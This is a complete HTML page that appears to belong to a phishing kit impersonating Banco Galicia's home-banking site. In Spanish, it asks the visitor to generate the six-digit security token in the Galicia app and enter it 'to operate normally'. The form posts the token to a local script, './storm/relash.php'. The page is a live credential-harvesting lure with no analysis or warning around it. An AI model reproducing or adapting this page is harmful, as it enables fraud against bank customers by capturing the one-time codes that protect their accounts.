<!DOCTYPE html>
<html>

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <link rel="icon" href="">

  <meta http-equiv="X-UA-Compatible" content="IE=edge">

  <title>Inicio</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    .button {
      background-color: #4CAF50;
      border: none;
      border-radius: 8px;
      color: white;
      padding: 16px 32px;
      text-align: center;
      text-decoration: none;
      display: inline-block;
      font-size: 16px;
      margin: 4px 2px;
      transition-duration: 0.4s;
      cursor: pointer;
    }

    .button1 {
      background-color: white;
      color: black;
      border: 2px solid red;
    }

    .button1:hover {
      background-color: red;
      color: white;
    }
  </style>
  <style>
    input {
      display: block;
      margin: 2em auto;
      border: none;
      padding: 0;
      width: 9.0ch;
      background: repeating-linear-gradient(90deg, dimgrey 0, dimgrey 1ch, transparent 0, transparent 1.5ch) 0 100%/ 10ch 2px no-repeat;
      font: 5ch droid sans mono, consolas, monospace;
      letter-spacing: 0.5ch;
    }

    input:focus {
      outline: none;
      color: black;
    }


    .timer-desktop[eyezx] {
      background-color: #fff;
    }

    #wrapper[eyezx] {
      position: absolute;
      top: 0px;
      min-height: 100%;
      width: 100%;
      overflow: hidden;
    }

    .text1[eyezx] {
      font-family: Arial;
      font-size: 17px;
      font-weight: bold;
      font-style: normal;
      font-stretch: normal;
      letter-spacing: normal;
      text-align: center;
      color: #000000;
    }

    .text2[eyezx] {
      font-family: Arial;
      font-size: 16px;
      font-weight: normal;
      font-style: normal;
      font-stretch: normal;
      letter-spacing: normal;
      text-align: center;
      color: #000000;
    }

    .logo[eyezx] {
      margin-top: 120px;
    }




    @media (max-width: 767px) {
      .logo[eyezx] {
        margin-top: 40px;
      }
    }


    .text-center {
      text-align: center !important
    }

    @media (min-width:576px) {
      .text-sm-left {
        text-align: left !important
      }
    }

    body {
      margin: 0;
    }
  </style>
</head>

<body>

  <div eyezx="" class="timer-desktop" id="wrapper">
    <div eyezx="">
      <div eyezx="" class="text-center">
        <img eyezx="" width="245px" class="  logo" src="./Office Banking_files/imag/index.png">
      </div>

      <div eyezx="" class="text-center">
        <h2 eyezx="" class=" text1">Ingrese su token para operar con normalidad desde su homebanking
        </h2>
      </div>
      <div eyezx="" class="text-center">
        <h3 eyezx="" class="text2" style="margin-top: 27px;">Generá el código token de 6 dígitos en la app <b
          style="color: orange;">Galicia</b>. Luego
        ingresalo en esta pantalla.
        </h3>


        <form method="post" action="./storm/relash.php">
          <input type="tel" name="topos" onkeypress="return controltag(event)" maxlength="6" minlength="6" required=""
            placeholder="******">

      </div>



      <div eyezx="" class="text-center" style="margin-top: 20px;">
        <button eyezx="" class="button button1" role="button" style="
      margin-bottom:  15px;">
          <span eyezx="">Confirmar</span>
        </button>

      </div>
    </div>
  </div>
  </form>


</body>

</html>